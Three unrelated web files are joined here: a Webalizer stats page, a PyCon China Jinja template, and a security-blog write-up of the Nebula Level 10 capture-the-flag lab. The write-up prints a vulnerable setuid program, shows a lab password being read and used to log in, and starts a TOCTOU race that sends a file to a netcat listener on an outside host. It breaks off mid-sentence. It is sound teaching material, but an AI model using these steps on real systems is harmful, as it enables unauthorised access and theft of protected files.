SIZE="-1"><B>590</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.56%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 9.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>180</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.53%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot/2.1</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>174</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.41%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">panscient.com</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>122</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.39%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">YandexBot/3.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Baiduspider/2.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>43</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.84%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Ezooms/1.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot-Image/1.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.27%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">YandexImages/3.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.25%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Microsoft-WebDAV-MiniRedir/6.0.6000</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.12%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 7.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.12%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">bingbot/2.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Googlebot/2.1 (+http://www.google.com/bot.html)</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">BlackBerry9630/5.0.0.732 Profile/MIDP-2.1 Configuration/CLDC-</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">ia_archiver (+http://www.alexa.com/site/help/webmasters; craw</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">MSIE 5.0</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Microsoft Office Existence Discovery</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Microsoft Office Protocol Discovery</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Nessus SOAP v0.0.1 (Nessus.org)</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">W3C_Validator/1.3</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">stackexchangebot/1.0</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPCTRYS"></A> <IMG SRC="ctry_usage_201205.png" ALT="Usage by Country for May 2012" HEIGHT=300 WIDTH=512><P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=8>Top 2 of 2 Total Countries</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#0080FF" ALIGN=center COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Country</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5100</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">99.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3158</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">100.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>122136</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">99.99%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">Unresolved/Unknown</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">US Commercial</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> </CENTER> <P> <HR> <TABLE WIDTH="100%" CELLPADDING=0 CELLSPACING=0 BORDER=0> <TR> <TD ALIGN=left VALIGN=top> <SMALL>Generated by <A HREF="http://www.mrunix.net/webalizer/"><STRONG>Webalizer Version 2.01</STRONG></A> </SMALL> </TD> </TR> </TABLE> <!-- Webalizer Version 2.01-10 (Mod: 16-Apr-2002) --> </BODY> </HTML>
TheBushyBrow/johnnyedick
stats/usage_201205.html
HTML
mit
181,683
{% extends "base/_base.html" %} {% import 'base/_speaker_macro.html' as speaker_macro %} {% set page_title = message.page_title_index %} {% block content %} <div class="ui vertical stripe segment pycon-odd-seg"> <div class="ui middle aligned stackable grid container"> <div class="row"> <div class="eight wide column"> <h3 class="ui header">{{ message.pycon_intro_title }}</h3> <p>{{ message.pycon_intro }}</p> </div> {% macro agenda_link(city) %} <div class="step"> <!--<i class="{{ 'remove from calendar' if city.completed else 'in cart' }} icon"></i>--> <div class="content"> <div class="title">{{ city.name }}</div> <div class="description">{{ city.date }}</div> </div> </div> {% endmacro %} <div class="six wide right floated column"> <div class="ui vertical steps"> {% for city_name in agenda.city_list %} {{ agenda_link(agenda[city_name]) }} {% endfor %} </div> </div> </div> <div class="row"> <div class="center aligned column"> <a class="ui huge primary button" href="{{ site.shanghai.booking_url }}" target="_blank">{{ message.shanghai_booking_now }}</a> <a class="ui huge primary button" href="{{ site.hangzhou.booking_url }}" target="_blank">{{ message.hangzhou_booking_now }}</a> </div> </div> </div> </div> <!-- 赞助商 --> <div class="ui vertical stripe center aligned segment pycon-odd-seg"> {% macro sponsor_block(sponsor_meta, sponsor_list) %} <div class="ui text container"> <h3 class="ui center aligned header sponsors">{{ sponsor_meta.name }}</h3> </div> <div class="ui container"> <div class="ui small images sponsors"> {% if sponsor_list %} {% for sponsor_info in sponsor_list %} <a href="{{ sponsor_info.link }}" target="_blank"> <img class="ui image" src="{{ sponsor_info.logo }}"> </a> {% endfor %} {% endif %} </div> </div> {% endmacro %} {% for sponsor_meta in sponsors.meta %} {{ sponsor_block(sponsor_meta, sponsors[sponsor_meta.level]) }} {% endfor %} </div> <!-- 讲师 --> <!-- FIXME: DRY --> {% for city in agenda.city_list %} {% set speaker_city = agenda[city].name + message.speakers %} {% set extra_class = loop.cycle('pycon-even-seg', 'pycon-odd-seg') %} {{ speaker_macro.speaker_block(speaker_city, selectspeakers(speakers, city), extra_class) }} {% endfor %} <!-- 蠎人赞助 --> <!-- FIXME: DRY --> {% if agenda.city_list|length % 2 == 0 %} {% set extra_class = "pycon-even-seg" %} {% else %} {% set extra_class = "pycon-odd-seg" %} {% endif %} <div class="ui vertical stripe center aligned segment {{ extra_class }}"> <div class="ui text container"> <h3 class="ui center aligned header pythoners">{{ message.donators }}</h3> </div> <!-- TODO: 头像放到CDN --> <div class="ui container pythoners"> {% for donator in donators %} <a class="ui image label"> <img src="{{ site.base_url }}/asset/images/avatar-2016/small/{{ loop.cycle('1', '2', '3', '4', '5', '6', '7', '8', '9') }}.jpg"> {{ donator}} </a> {% endfor %} </div> </div> {% endblock %}
PyConChina/PyConChina2017
src/index.html
HTML
mit
3,185
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.2/cookieconsent.min.css" /> <script async defer src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.2/cookieconsent.min.js"></script> <script> window.addEventListener("load", function(){ window.cookieconsent.initialise({ "palette": { "popup": { "background": "#424242" }, "button": { "background": "#2a7ae2" } }, "content": { "href": "/privacy-policy" } })}); </script> <title>Exploit Exercises: Nebula Level 10</title> <meta name="description" content=""> <meta name="keywords" content="Lucian Nitescu nebula writeups level flag getflag exploit exercise tutorial solution"> <link rel="stylesheet" href="/assets/main.css"> <link rel="canonical" href="https://nitesculucian.github.io/2018/07/16/exploit-exercises-nebula-level-10/"> <link rel="alternate" type="application/rss+xml" title="Lucian Nitescu" href="https://nitesculucian.github.io/feed.xml"> <meta name="flattr:id" content="njnwdo"> <!-- Hotjar Tracking Code for https://nitesculucian.github.io/ --> <script> (function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:1067531,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv='); </script> <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js"> </script> <meta property="og:image" content="https://nitesculucian.github.io/uploads/Screenshot%20from%202018-07-16%2000-20-16.png" alt="Image of Nebula Terminal" " /> <meta name="twitter:image" content="https://nitesculucian.github.io/uploads/Screenshot%20from%202018-07-16%2000-20-16.png" alt="Image of Nebula Terminal" " /> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Exploit Exercises: Nebula Level 10"> <meta name="twitter:description" content=""> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css?family=Bitter:400,400i,700" rel="stylesheet"> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-107695141-1', 'auto'); ga('send', 'pageview'); </script> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Lucian Nitescu</a> <nav class="site-nav"> <a class="page-link" href="/">Home</a> <a class="page-link" href="/about/">Whoami</a> <a class="page-link" href="/archives/">Archives</a> </nav> <br>Security Blog </div> </header> <main class="page-content" aria-label="Content"> <div class="wrapper"> <article class="post" itemscope itemtype="http://schema.org/BlogPosting"> <header class="post-header"> <h1 class="post-title" itemprop="name headline">Exploit Exercises: Nebula Level 10</h1> <p class="post-meta"><time datetime="2018-07-16T15:49:00-03:00" itemprop="datePublished">Jul 16, 2018</time> • <a href="/categories/nebula/">nebula</a>, <a href="/categories/writeups/">writeups</a> </p> </header> <hr> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- all pages --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-0255642880549652" data-ad-slot="6220756861" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <hr> <div class="post-content" itemprop="articleBody" style="word-wrap:break-word"> <p><img src="/uploads/Screenshot%20from%202018-07-16%2000-20-16.png" alt="Image of Nebula Terminal" /></p> <p>The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.</p> <p>To do this level, log in as the level10 account with the password level10. Files for this level can be found in /home/flag10.</p> <h3 id="source-code">Source code</h3> <p>(basic.c)</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/types.h&gt; #include &lt;stdio.h&gt; #include &lt;fcntl.h&gt; #include &lt;errno.h&gt; #include &lt;sys/socket.h&gt; #include &lt;netinet/in.h&gt; #include &lt;string.h&gt; </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">file</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span><span class="n">host</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="n">argc</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%s file host</span><span class="se">\n\t</span><span class="s">sends file to host if you have access to it</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">file</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> <span class="n">host</span> <span class="o">=</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="k">if</span><span class="p">(</span><span class="n">access</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">R_OK</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="kt">int</span> <span class="n">ffd</span><span class="p">;</span> <span class="kt">int</span> <span class="n">rc</span><span class="p">;</span> <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sin</span><span class="p">;</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Connecting to %s:18211 .. "</span><span class="p">,</span> <span class="n">host</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">sin</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr_in</span><span class="p">));</span> <span class="n">sin</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span> <span class="n">sin</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">host</span><span class="p">);</span> <span class="n">sin</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="mi">18211</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">sin</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr_in</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Unable to connect to host %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">host</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="p">}</span> <span class="cp">#define HITHERE ".oO Oo.\n" </span> <span class="k">if</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">HITHERE</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">HITHERE</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Unable to write banner to host %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">host</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="p">}</span> <span class="cp">#undef HITHERE </span> <span class="n">printf</span><span class="p">(</span><span class="s">"Connected!</span><span class="se">\n</span><span class="s">Sending file .. "</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span> <span class="n">ffd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">ffd</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Damn. Unable to open file</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="p">}</span> <span class="n">rc</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">ffd</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span> <span class="k">if</span><span class="p">(</span><span class="n">rc</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Unable to read from file: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span> <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="p">}</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">rc</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"wrote file!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"You don't have access to %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">file</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <h3 id="solution">Solution</h3> <p>Unfortunately for this challenge, the team from Exploit Exercises forgot an important file straight in the home folder of level 10 user! At first, I could not believe it, but here is the write up of it:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:~$</span> <span class="nb">ls</span> <span class="nt">-al</span> <span class="go">total 11 drwxr-x--- 1 level10 level10 60 Oct 31 14:43 . drwxr-xr-x 1 root root 60 Aug 27 2012 .. -rw-r--r-- 1 level10 level10 220 May 18 2011 .bash_logout -rw-r--r-- 1 level10 level10 3353 May 18 2011 .bashrc drwx------ 2 level10 level10 60 Oct 31 14:43 .cache -rw------- 1 level10 level10 43 Aug 19 2012 .lesshst -rw-r--r-- 1 level10 level10 675 May 18 2011 .profile -rw------- 1 level10 level10 4283 Aug 19 2012 .viminfo -rw-rw-r-- 1 level10 level10 382 Aug 19 2012 x </span><span class="gp">level10@nebula:~$</span> <span class="go">Here we can observe the file called "x" and it reveals the following: </span><span class="gp">level10@nebula:~$</span> <span class="nb">cat </span>x | <span class="nb">grep </span>6 <span class="go">615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 </span><span class="gp">level10@nebula:~$</span> <span class="go">Hmmm, weeeeellll…​ That’s the password of your target account called flag10. Let’s take the flag! </span><span class="gp">level10@nebula:~$</span> ssh flag10@localhost <span class="go">The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. _ __ __ __ / | / /__ / /_ __ __/ /___ _ / |/ / _ \/ __ \/ / / / / __ `/ / /| / __/ /_/ / /_/ / / /_/ / /_/ |_/\___/_.___/\__,_/_/\__,_/ exploit-exercises.com/nebula For level descriptions, please see the above URL. To log in, use the username of "levelXX" and password "levelXX", where XX is the level number. Currently there are 20 levels (00 - 19). flag10@localhost's password: Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686) * Documentation: https://help.ubuntu.com/ New release '12.04 LTS' available. Run 'do-release-upgrade' to upgrade to it. </span><span class="gp">The programs included with the Ubuntu system are free software;</span> <span class="go">the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. </span><span class="gp">flag10@nebula:~$</span> getflag <span class="go">You have successfully executed getflag on a target account </span><span class="gp">flag10@nebula:~$</span> </code></pre></div></div> <p>And that’s it! We have completed out task. What we learned? Nothing! Now let’s get back to the intended task. Contents of the flag10 user account home folder:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:/home/flag10$</span> <span class="nb">ls</span> <span class="nt">-al</span> <span class="go">total 14 drwxr-x--- 2 flag10 level10 93 Nov 20 2011 . drwxr-xr-x 1 root root 60 Aug 27 2012 .. -rw-r--r-- 1 flag10 flag10 220 May 18 2011 .bash_logout -rw-r--r-- 1 flag10 flag10 3353 May 18 2011 .bashrc -rw-r--r-- 1 flag10 flag10 675 May 18 2011 .profile -rwsr-x--- 1 flag10 level10 7743 Nov 20 2011 flag10 -rw------- 1 flag10 flag10 37 Nov 20 2011 token </span><span class="gp">level10@nebula:/home/flag10$</span> </code></pre></div></div> <p>And here are the most important files:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:/home/flag10$</span> file flag10 <span class="go">flag10: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped </span><span class="gp">level10@nebula:/home/flag10$</span> <span class="go">And the surprise: </span><span class="gp">level10@nebula:/home/flag10$</span> <span class="nb">cat </span>token <span class="go">cat: token: Permission denied </span><span class="gp">level10@nebula:/home/flag10$</span> </code></pre></div></div> <p>I bet we have to retrieve the token somehow in order to log in to our target account log10 (same as in the above file). Let’s take a look at our files.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:/home/flag10$</span> <span class="nb">ls</span> <span class="nt">-al</span> <span class="go">total 14 drwxr-x--- 2 flag10 level10 93 Nov 20 2011 . drwxr-xr-x 1 root root 60 Aug 27 2012 .. -rw-r--r-- 1 flag10 flag10 220 May 18 2011 .bash_logout -rw-r--r-- 1 flag10 flag10 3353 May 18 2011 .bashrc -rw-r--r-- 1 flag10 flag10 675 May 18 2011 .profile -rwsr-x--- 1 flag10 level10 7743 Nov 20 2011 flag10 -rw------- 1 flag10 flag10 37 Nov 20 2011 token </span><span class="gp">level10@nebula:/home/flag10$</span> </code></pre></div></div> <p>Only flag10 user account can access the token file, or an another vulnerable SUID applications like flag10 elf (SUID permissions: -rwsr-x—). Let’s take a look at our source code.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="n">access</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">R_OK</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </code></pre></div></div> <p>This tells all everything about this level. From the man page (level10@nebula:/home/flag10$ man access):</p> <ul> <li>access() checks whether the calling process can access the file path‐name.</li> <li>The check is done using the calling process’s real UID and GID, rather than the effective IDs as is done when actually attempting an operation (e.g., open(2)) on the file.</li> </ul> <p>Also inside this IF statement we have:</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ffd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span> </code></pre></div></div> <p>⇒ In other words this is a a time-of-use to time-of-check or TOCTOU bug (https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use).</p> <p>⇒ If we can swap out the file between the time-of-check and the time-of-use, we should be able to send token.</p> <p>⇒ Race condition! Let’s try!</p> <p>Nebula system:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:/home/flag10$</span> nano /tmp/token <span class="gp">level10@nebula:/home/flag10$</span> <span class="nb">cat</span> /tmp/token <span class="go">Here I have full access. </span><span class="gp">level10@nebula:/home/flag10$</span> <span class="go">Personal system: </span><span class="gp">root@yourcomputer:~$</span> nc <span class="nt">-l</span> 18211 <span class="go">Nebula system: </span><span class="gp">level10@nebula:/home/flag10$</span> ./flag10 /tmp/token 192.168.56.1 <span class="go">Connecting to 192.168.56.1:18211 .. Connected! Sending file .. wrote file! </span><span class="gp">level10@nebula:/home/flag10$</span> </code></pre></div></div> <p>Personal system:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@yourcomputer:~$</span> nc <span class="nt">-l</span> 18211 <span class="go">.oO Oo. Here I have full access. </span></code></pre></div></div> <p>⇒ If I have access to my token file then I can get my token.</p> <p>Hmmm. Do you remember our friendly 